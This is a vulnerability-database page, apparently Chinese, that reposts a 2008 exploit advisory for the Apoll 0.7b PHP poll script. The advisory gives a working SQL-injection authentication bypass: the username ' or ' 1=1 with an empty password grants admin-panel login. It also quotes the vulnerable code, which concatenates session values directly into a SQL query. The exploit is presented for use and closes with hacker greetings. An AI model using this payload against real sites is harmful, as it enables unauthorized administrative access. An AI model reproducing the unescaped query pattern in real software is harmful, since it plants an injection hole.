CVE-2008-6270 CVE-2008-6272 Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability-漏洞情报、漏洞详情、安全漏洞、CVE

Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

漏洞ID	1052150	漏洞类型
发布时间	2009-02-27	更新时间	2009-02-27
CVE编号	CVE-2008-6270 CVE-2008-6272	CNNVD-ID	N/A
漏洞平台	N/A	CVSS评分	N/A

[~] Apoll version Remote Auth Bypass Vulnerability
[~]
[~] version: beta 0.7
[~]
[~] script dwonload: http://www.miticdjd.com/download/3/
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

admin login:

http://localhost/apoll/admin/index.php


Exploit:

username: [real_admin_or_user_name] ' or ' 1=1

password: dont write anything

note: generally admin name: admin 


example for my localhost:

admin: zorlu

user: salla



username: zorlu ' or ' 1=1

password: empty

or &#195;&#189; added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )

username: salla ' or ' 1=1

password: empty 


file: 

apoll/admin/index.php

code:

$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
	$num = @mysql_num_rows($mysql);




[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

|漏洞来源

|漏洞详情

|漏洞EXP

检索漏洞

相关漏洞